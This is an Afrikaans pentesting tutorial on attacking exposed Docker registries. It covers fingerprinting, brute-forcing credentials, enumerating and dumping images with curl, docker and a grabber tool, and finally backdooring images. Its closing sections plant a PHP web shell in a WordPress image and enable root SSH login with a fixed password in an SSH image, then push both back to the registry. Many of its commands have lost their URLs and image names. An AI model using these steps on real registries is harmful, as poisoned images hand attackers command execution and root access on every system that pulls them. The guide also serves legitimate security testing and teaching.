5000 - Pentesting Docker Registry

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Basiese Inligting

'n Berging en verspreidingstelsel bekend as 'n Docker registry is in plek vir Docker-prente wat genoem word en in verskeie weergawes kan voorkom, onderskei deur etikette. Hierdie prente is georganiseer binne Docker repositories in die registry, elke repository stoor verskillende weergawes van 'n spesifieke prent. Die funksionaliteit wat verskaf word, laat toe dat prente plaaslik afgelaai of na die registry opgelaai kan word, mits die gebruiker die nodige toestemmings het.

DockerHub dien as die standaard openbare registry vir Docker, maar gebruikers het ook die opsie om 'n plaaslike weergawe van die oopbron Docker registry/verspreiding te bedryf of te kies vir die kommersieel ondersteun Docker Trusted Registry. Daarbenewens kan verskeie ander openbare registries aanlyn gevind word.

Om 'n prent van 'n plaaslike registry af te laai, word die volgende opdrag gebruik:

docker pull my-registry:9000/foo/bar:2.1

Hierdie opdrag haal die foo/bar beeld weergawe 2.1 van die plaaslike registrasie by die my-registry domein op poort 9000. Omgekeerd, om dieselfde beeld van DockerHub af te laai, veral as 2.1 die nuutste weergawe is, vereenvoudig die opdrag tot:

docker pull foo/bar

Standaard poort: 5000

5000/tcp open  http    Docker Registry (API: 2.0)


Die maklikste manier om hierdie diens te ontdek wat loop, is om dit op die uitvoer van nmap te kry. In elk geval, let daarop dat, aangesien dit 'n HTTP-gebaseerde diens is, dit agter HTTP-proxies kan wees en nmap dit nie sal opspoor. Sommige vingerafdrukke:

  • As jy toegang tot / kry, word daar niks in die antwoord teruggestuur nie

  • As jy toegang tot /v2/ kry, word {} teruggestuur

  • As jy toegang tot /v2/_catalog kry, kan jy verkry:

  • {"repositories":["alpine","ubuntu"]}

  • {"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}



Docker registry kan gekonfigureer word om HTTP of HTTPS te gebruik. So die eerste ding wat jy dalk moet doen, is om te vind watter een geconfigureer word:

curl -s
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.



Docker registry kan ook gekonfigureer word om authentisering te vereis:

curl -k
#If Authentication required
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}
#If no authentication required

As die Docker Registry outentisering vereis, kan jy probeer om dit te brute force met hierdie. As jy geldige akrediteerbesonderhede vind, sal jy dit moet gebruik om die registry te enumerate, in curl kan jy dit soos volg gebruik:

curl -k -u username:password

Enumerasie met DockerRegistryGrabber

DockerRegistryGrabber is 'n python-gereedskap om docker registrasie te enumereer / te dump (sonder of met basiese outentisering)

usage: drg.py [-h] [-p port] [-U USERNAME] [-P PASSWORD] [-A header] [--list | --dump_all | --dump DOCKERNAME] url

____   ____    ____
|  _ \ |  _ \  / ___|
| | | || |_) || |  _
| |_| ||  _ < | |_| |
|____/ |_| \_\ \____|
Docker Registry grabber tool v2
by @SyzikSecu

positional arguments:
url                URL

-h, --help         show this help message and exit
-p port            port to use (default : 5000)

-U USERNAME        Username
-P PASSWORD        Password
-A header          Authorization bearer token

--dump DOCKERNAME  DockerName

Example commands:
python drg.py --list
python drg.py --dump my-ubuntu
python drg.py --dump_all
python drg.py -U 'testuser' -P 'testpassword' --list
python drg.py -U 'testuser' -P 'testpassword' --dump my-ubuntu
python drg.py -U 'testuser' -P 'testpassword' --dump_all
python drg.py -A '<Auth BEARER TOKEN>' --list
python drg.py -A '<Auth BEARER TOKEN>' --dump my-ubuntu
python drg.py -A '<Auth BEARER TOKEN>' --dump_all

python3 DockerGraber.py  --list

[+] my-ubuntu
[+] my-ubuntu2

python3 DockerGraber.py  --dump my-ubuntu

[+] blobSum found 5
[+] Dumping my-ubuntu
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888

python3 DockerGraber.py  --dump_all

[+] my-ubuntu
[+] my-ubuntu2
[+] blobSum found 5
[+] Dumping my-ubuntu
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
[+] blobSum found 5
[+] Dumping my-ubuntu2
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888

Enumeration using curl

Sodra jy toegang tot die docker registry verkry het, is hier 'n paar opdragte wat jy kan gebruik om dit te evalueer:

#List repositories
curl -s

#Get tags of a repository
curl -s

#Get manifests
curl -s
"schemaVersion": 1,
"name": "ubuntu",
"tag": "latest",
"architecture": "amd64",
"fsLayers": [
"blobSum": "sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935"
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
"blobSum": "sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10"
"history": [
"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d \"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}"
"v1Compatibility": "{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop)  CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}"
"v1Compatibility": "{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / \"]}}"
"signatures": [
"header": {
"jwk": {
"crv": "P-256",
"kty": "EC",
"x": "leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg",
"y": "Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg"
"alg": "ES256"
"signature": "GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q",
"protected": "eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ"

#Download one of the previously listed blobs
curl --output blob1.tar

#Inspect the insides of each blob
tar -xf blob1.tar #After this,inspect the new folders and files created in the current directory

Let daarop dat wanneer jy die blobs lêers aflaai en dekomprimeer, sal lêers en mappen in die huidige gids verskyn. As jy al die blobs aflaai en in dieselfde gids dekomprimeer, sal hulle waardes van die voorheen gedecomprimeerde blobs oorskryf, so wees versigtig. Dit mag interessant wees om elke blob binne 'n ander gids te dekomprimeer om die presiese inhoud van elke blob te ondersoek.

Enumerasie met behulp van docker

#Once you know which images the server is saving (/v2/_catalog) you can pull them
docker pull

#Check the commands used to create the layers of the image
docker history
#IMAGE               CREATED             CREATED BY                                      SIZE                COMMENT
#ed05bef01522        2 years ago         ./run.sh                                        46.8MB
#<missing>           2 years ago         /bin/sh -c #(nop)  CMD ["./run.sh"]             0B
#<missing>           2 years ago         /bin/sh -c #(nop)  EXPOSE 80                    0B
#<missing>           2 years ago         /bin/sh -c cp $base/mysql-setup.sh /            499B
#<missing>           2 years ago         /bin/sh -c #(nop) COPY dir:0b657699b1833fd59…   16.2MB

#Run and get a shell
docker run -it bash #Leave this shell running
docker ps #Using a different shell
docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container

Backdooring WordPress image

In die scenario waar jy 'n Docker Registry gevind het wat 'n wordpress beeld stoor, kan jy dit backdoor. Skep die backdoor:

<?php echo shell_exec($_GET["cmd"]); ?>

Skep 'n Dockerfile:

COPY shell.php /app/
RUN chmod 777 /app/shell.php

Skep die nuwe beeld, kontroleer of dit geskep is, en druk dit:

docker build -t .
docker images
docker push registry:5000/wordpress #Push it

Backdooring SSH server image

Neem aan dat jy 'n Docker Registry met 'n SSH beeld gevind het en jy wil dit backdoor. Laai af die beeld en voer dit uit:

docker pull
docker run -d

Haal die sshd_config lêer uit die SSH beeld:

docker cp 4c989242c714:/etc/ssh/sshd_config .

En wysig dit om in te stel: PermitRootLogin yes

Skep 'n Dockerfile soos die volgende een:

COPY sshd_config /etc/ssh/
RUN echo root:password | chpasswd

Skep die nuwe beeld, kontroleer of dit geskep is, en druk dit:

docker build -t .
docker images
docker push registry:5000/sshd-docker-cli #Push it


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